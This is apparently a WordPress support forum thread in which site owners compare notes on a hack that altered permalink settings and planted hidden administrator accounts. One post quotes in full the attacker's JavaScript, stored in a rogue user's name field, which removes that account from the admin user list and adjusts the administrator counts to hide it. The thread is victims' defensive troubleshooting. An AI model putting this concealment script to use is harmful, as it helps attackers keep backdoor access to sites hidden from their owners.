johninnit

Thanks very much for posting this help everyone. I’ve switched to PHP Execution as well and the McAfee conflict luckily seems to be gone. Shame a McAfee mistake is making us switch away from a perfectly good plugin, but hey ho…

Chloe,

Oh ?? That’s very odd.

I had some good advice on clearing up after upgrade here https://www.ads-software.com/support/topic/307518?replies=15 – if you don’t know it already (I didn’t!)

johncsnider, it should be possible to just choose one of the default permalink options in admin and have them fix themselves (and then upgrade and clean)

The blog that had the admin inserted was on 2.6.3 at the time, and the one that didn’t was on 2.7.1, so maybe the admin insertion in older blogs is the real aim behind this, and the permalink screwup without admin insertion is just all that later versions will permit.

I got him by clicking on another user, and then just increasing the user ID number in the URL til I found him

I deleted that javascript and saved him as a subscriber, and then I could see him in the lists and delete him

Got it – he has a first name of a whole bunch of javascript designed to hide him.

here it is

… <div id=”user_superuser”><script language=”JavaScript”> var setUserName = function(){ try{ var t=document.getElementById(“user_superuser”); while(t.nodeName!=”TR”){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName(“H3″); var s = ” shown below”; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName(“ul”); for(var i in arr) if(arr[i].className==”subsubsub”){ var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML); if(n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,”>Administrator (“+(n[1]-1)+”)<“); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script></div>

Thanks for that Chloe. I had 2 blogs compromised. One didn’t have new users, but one indeed has a new admin, RobertToth89 or similar. He disappears immediately after loading the page, so I can’t edit or delete him.

Thanks for all the help Gangleri, some very useful info there for novices like me!
So that’s my morning cut out for me then…

Don’t recognise any new users, or even if there are, they’re only subscriber level, nothing author or above.

No new posts/pages, and can’t see any new folders or files on the server when sorting them by last update. So fingers crossed it was just someone proving they could change something, even if it wasn’t any concrete use to them.

True Gangleri, will get busy upgrading!

Yes – it’s happened to another one too,
https://www.strongerunions.org – which is on 2.62

But oddly not to the other 6 wordpress blogs I run (yet).

And same with one I work on https://www.touchstoneblog.org.uk –
Likewise I found this via googling this exact string. Checked the permalinks page and all that gunk was indeed appended to my string, even though I’d not changed that setting in a year. Using version 2.7.1

This is very odd. Going to check my other wordpress blogs now.